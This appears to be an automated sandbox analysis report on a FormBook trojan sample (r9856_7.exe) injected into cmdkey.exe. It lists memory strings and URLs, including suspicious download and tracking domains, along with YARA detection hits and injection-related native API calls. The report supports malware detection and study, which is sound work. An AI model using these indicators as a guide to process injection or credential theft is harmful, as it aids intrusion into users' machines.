            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/style.min.css?v=1.2.4
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hiretemp.net/Hiring_Firm.cfm?fp=4sYsJ6hmAV92GOPbYgqhq6Pa7rFOcv%2FiQ1gUTNg2fXYprH4vjFihEX2
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hiretemp.net/Hiring_Staffing.cfm?fp=4sYsJ6hmAV92GOPbYgqhq6Pa7rFOcv%2FiQ1gUTNg2fXYprH4vjFi
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hiretemp.net/Immediate_Hiring_Employees.cfm?fp=4sYsJ6hmAV92GOPbYgqhq6Pa7rFOcv%2FiQ1gUTNg2
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hiretemp.net/display.cfm
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.hiretemp.net/px.js?ch=1
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.hiretemp.net/px.js?ch=2
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.hiretemp.net/sk-logabpstatus.php?a=azI2OHRXUHVzMTBzQXZ5ektDRlFPdm5kMWRrSHFZcXJyR0pab3RFT2
            Source: NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a1.html
            Source: NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a2.html
            Source: cmdkey.exe, 00000008.00000002.3818027240.00000000041D8000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a5.html
            Source: cmdkey.exe, 00000008.00000002.3818027240.00000000041D8000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a6.html
            Source: cmdkey.exe, 00000008.00000002.3818027240.00000000041D8000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a8.html
            Source: cmdkey.exe, 00000008.00000002.3818027240.00000000041D8000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a9.html
            Source: cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
            Source: cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000004CD6000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004566000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
            Source: NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: cmdkey.exe, 00000008.00000002.3818027240.00000000049B2000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004242000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: cmdkey.exe, 00000008.00000002.3818027240.00000000041D8000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://js.users.51.la/21851687.js
            Source: cmdkey.exe, 00000008.00000002.3814752917.0000000002F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: cmdkey.exe, 00000008.00000002.3814752917.0000000002F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: cmdkey.exe, 00000008.00000002.3814752917.0000000002F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: cmdkey.exe, 00000008.00000002.3814752917.0000000002F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=10336
            Source: cmdkey.exe, 00000008.00000002.3814752917.0000000002F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: cmdkey.exe, 00000008.00000002.3814752917.0000000002F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: cmdkey.exe, 00000008.00000002.3814752917.0000000002F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: cmdkey.exe, 00000008.00000003.1728997470.0000000007EB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://support.hostgator.com/
            Source: cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000531E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004BAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.htmlit.com.cn/
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.zblogcn.com/

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.r9856_7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.r9856_7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.3819616771.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3814636259.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3816875853.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1545185374.0000000001500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3816533297.0000000003160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1545720101.0000000002060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 4.2.r9856_7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.r9856_7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3819616771.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3814636259.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3816875853.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1545185374.0000000001500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3816533297.0000000003160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1545720101.0000000002060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0042C1A3 NtClose,4_2_0042C1A3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122B60 NtClose,LdrInitializeThunk,4_2_01122B60
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01122DF0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01122C70
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011235C0 NtCreateMutant,LdrInitializeThunk,4_2_011235C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01124340 NtSetContextThread,4_2_01124340
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01124650 NtSuspendThread,4_2_01124650
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122B80 NtQueryInformationFile,4_2_01122B80
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122BA0 NtEnumerateValueKey,4_2_01122BA0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122BF0 NtAllocateVirtualMemory,4_2_01122BF0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122BE0 NtQueryValueKey,4_2_01122BE0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122AB0 NtWaitForSingleObject,4_2_01122AB0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122AD0 NtReadFile,4_2_01122AD0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122AF0 NtWriteFile,4_2_01122AF0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122D10 NtMapViewOfSection,4_2_01122D10
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122D00 NtSetInformationFile,4_2_01122D00
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122D30 NtUnmapViewOfSection,4_2_01122D30
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122DB0 NtEnumerateKey,4_2_01122DB0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122DD0 NtDelayExecution,4_2_01122DD0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122C00 NtQueryInformationProcess,4_2_01122C00
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122C60 NtCreateKey,4_2_01122C60
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122CA0 NtQueryInformationToken,4_2_01122CA0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122CC0 NtQueryVirtualMemory,4_2_01122CC0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122CF0 NtOpenProcess,4_2_01122CF0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122F30 NtCreateSection,4_2_01122F30
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122F60 NtCreateProcessEx,4_2_01122F60
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122F90 NtProtectVirtualMemory,4_2_01122F90
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122FB0 NtResumeThread,4_2_01122FB0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122FA0 NtQuerySection,4_2_01122FA0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122FE0 NtCreateFile,4_2_01122FE0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122E30 NtWriteVirtualMemory,4_2_01122E30
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122E80 NtReadVirtualMemory,4_2_01122E80
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122EA0 NtAdjustPrivilegesToken,4_2_01122EA0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122EE0 NtQueueApcThread,4_2_01122EE0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01123010 NtOpenDirectoryObject,4_2_01123010
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01123090 NtSetValueKey,4_2_01123090
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011239B0 NtGetContextThread,4_2_011239B0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01123D10 NtOpenProcessToken,4_2_01123D10
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01123D70 NtOpenThread,4_2_01123D70
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03514340 NtSetContextThread,LdrInitializeThunk,8_2_03514340
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03514650 NtSuspendThread,LdrInitializeThunk,8_2_03514650
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512B60 NtClose,LdrInitializeThunk,8_2_03512B60
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_03512BF0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512BE0 NtQueryValueKey,LdrInitializeThunk,8_2_03512BE0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_03512BA0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512AD0 NtReadFile,LdrInitializeThunk,8_2_03512AD0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512AF0 NtWriteFile,LdrInitializeThunk,8_2_03512AF0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512F30 NtCreateSection,LdrInitializeThunk,8_2_03512F30
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512FE0 NtCreateFile,LdrInitializeThunk,8_2_03512FE0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512FB0 NtResumeThread,LdrInitializeThunk,8_2_03512FB0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512EE0 NtQueueApcThread,LdrInitializeThunk,8_2_03512EE0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_03512E80
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512D10 NtMapViewOfSection,LdrInitializeThunk,8_2_03512D10
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_03512D30
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512DD0 NtDelayExecution,LdrInitializeThunk,8_2_03512DD0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_03512DF0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_03512C70
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512C60 NtCreateKey,LdrInitializeThunk,8_2_03512C60
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_03512CA0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_035135C0 NtCreateMutant,LdrInitializeThunk,8_2_035135C0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_035139B0 NtGetContextThread,LdrInitializeThunk,8_2_035139B0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512B80 NtQueryInformationFile,8_2_03512B80
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512AB0 NtWaitForSingleObject,8_2_03512AB0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512F60 NtCreateProcessEx,8_2_03512F60
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512F90 NtProtectVirtualMemory,8_2_03512F90
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512FA0 NtQuerySection,8_2_03512FA0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512E30 NtWriteVirtualMemory,8_2_03512E30
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512EA0 NtAdjustPrivilegesToken,8_2_03512EA0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512D00 NtSetInformationFile,8_2_03512D00
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512DB0 NtEnumerateKey,8_2_03512DB0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512C00 NtQueryInformationProcess,8_2_03512C00
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512CC0 NtQueryVirtualMemory,8_2_03512CC0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03512CF0 NtOpenProcess,8_2_03512CF0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03513010 NtOpenDirectoryObject,8_2_03513010
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03513090 NtSetValueKey,8_2_03513090
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03513D70 NtOpenThread,8_2_03513D70
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_03513D10 NtOpenProcessToken,8_2_03513D10
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A289B0 NtCreateFile,8_2_00A289B0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A28B20 NtReadFile,8_2_00A28B20
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A28CB0 NtClose,8_2_00A28CB0
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A28C10 NtDeleteFile,8_2_00A28C10
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A28E20 NtAllocateVirtualMemory,8_2_00A28E20
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 0_2_02E7D5BC0_2_02E7D5BC
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 0_2_072DE4180_2_072DE418
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 0_2_072D3B900_2_072D3B90
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 0_2_072D77790_2_072D7779
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 0_2_072D77880_2_072D7788
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 0_2_072D96A00_2_072D96A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 0_2_072D92680_2_072D9268
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 0_2_072D92570_2_072D9257
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 0_2_072D7BC00_2_072D7BC0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 0_2_072D9AD80_2_072D9AD8
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_004182634_2_00418263
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_004010F94_2_004010F9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_004011004_2_00401100
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_004032704_2_00403270
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_00402AA04_2_00402AA0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0040FB4A4_2_0040FB4A
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0040FB534_2_0040FB53
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_004164404_2_00416440
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_004164434_2_00416443
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0040FD734_2_0040FD73
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0040DDF34_2_0040DDF3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_00401D904_2_00401D90
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_004026404_2_00402640
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_004026334_2_00402633
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0042E7E34_2_0042E7E3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118A1184_2_0118A118
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E01004_2_010E0100
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011781584_2_01178158
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B01AA4_2_011B01AA
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011A41A24_2_011A41A2
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011A81CC4_2_011A81CC
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011820004_2_01182000
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011AA3524_2_011AA352
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B03E64_2_011B03E6
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010FE3F04_2_010FE3F0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011902744_2_01190274
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011702C04_2_011702C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F05354_2_010F0535
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B05914_2_011B0591
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011944204_2_01194420
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011A24464_2_011A2446
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0119E4F64_2_0119E4F6
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011147504_2_01114750
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F07704_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EC7C04_2_010EC7C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110C6E04_2_0110C6E0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011069624_2_01106962
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F29A04_2_010F29A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011BA9A64_2_011BA9A6
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F28404_2_010F2840
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010FA8404_2_010FA840
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010D68B84_2_010D68B8
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111E8F04_2_0111E8F0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011AAB404_2_011AAB40
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011A6BD74_2_011A6BD7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EEA804_2_010EEA80
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118CD1F4_2_0118CD1F
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010FAD004_2_010FAD00
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01108DBF4_2_01108DBF
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EADE04_2_010EADE0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0C004_2_010F0C00
